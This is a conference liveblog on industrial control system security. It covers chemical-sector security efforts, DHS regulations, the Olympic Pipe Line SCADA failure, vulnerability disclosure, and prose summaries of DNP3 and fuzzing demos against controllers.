Back again semi-liveblogging on day two at Joe Weiss’s conference. I think the day two agenda is the most interesting with sessions in the afternoon on field device vulnerabilities. Check back often for updates.

9:15AM - An overview of the Chemical Sectors efforts in control system security is presented by two individuals from Dow Chemicals. Two great things about the Chemical Sector:

1. The large companies from the Chemical Sector are some of the most active participants and leaders in the control system security standards efforts.

2. The Chemical Sector makes their work product in this area available to everyone at www.chemicalcybersecurity.com.

Chemical industry will be participating in DHS’s Cyberstorm II.

A brief and interesting discussion in the Q&A on the new DHS regulations on the chemical sector. DHS’s Chemical Security Compliance Sector is working out the details to implement the law now. The large Tier 1 companies will be audited in person by DHS or their representatives. The regulations are “primarily physical with cyber overtones”. If you are familiar with Sandia’s RAM (Risk Assessment Methodologies such as RAM-W for water and RAMCAP for chemical), the emphasis on physical is similar.

11:45AM - Marshall Abrams from MITRE, with help from Joe Weiss, did a case study on the Olympic Pipe Line incident in Bellingham, WA on June 10, 1999. While the cause of the rupture and ensuing fire and death were not due to a cyber security incident, the fact that the leak was not detected for approximately 90 minutes was a fault of the SCADA and leak detection system. See the description of the SCADA failures starting on page 61 of the NTSB report.

Interestingly some of the key personnel invoked their Fifth Amendment rights and refused to testify and some logs were missing. There are still some unknowns as to what actually caused the SCADA failure.

2:15PM - Perry Pederson of DHS NCSD is talking about one of Digital Bond’s hot topics, vulnerability disclosure. There is a large US-CERT part to this story. It is good to see DHS promoting this.

I wish DHS would use their muscle and power of the purse to force the National Labs to report identified vulnerabilities to US-CERT. There are lab-vendor agreements that prevent this now, but the labs have enough clout in this industry to include a report to US-CERT in 3 or 6 months clause in those agreements.

3:15PM - A couple of live demos this afternoon. First Mark Hadley of PNL showed that he could run a DoS attack or control a remote device via the DNP3 protocol. This is true of most control protocols because they lack user/device and data authentication. This seems old hat and has been shown for years, but it is effective for those new to control system security. Watch. See me change the lights. Watch me turn the lights out.

Of course Secure DNP3 has the promise to change this.

Following Mark is a team from Mu Security. They are demonstrating their fuzzing/security analysis platform on the ICMP and TCP protocols in a controller which I’m tempted to name, but will not. Claimed to find 500 vulnerabilities in the ICMP protocol alone. The impact of the vulnerabilities varies from a 4 second hang to requiring a reboot. Run a series of fuzzed packets and watch the controller crash.

Loyal readers of this blog, and users of controllers, know how fragile many controller protocol stacks are. This is an effective demo and highlights a large problem.

The issue that controller vendors often purchase stacks from third parties is raised. This is a problem when it comes to remediation.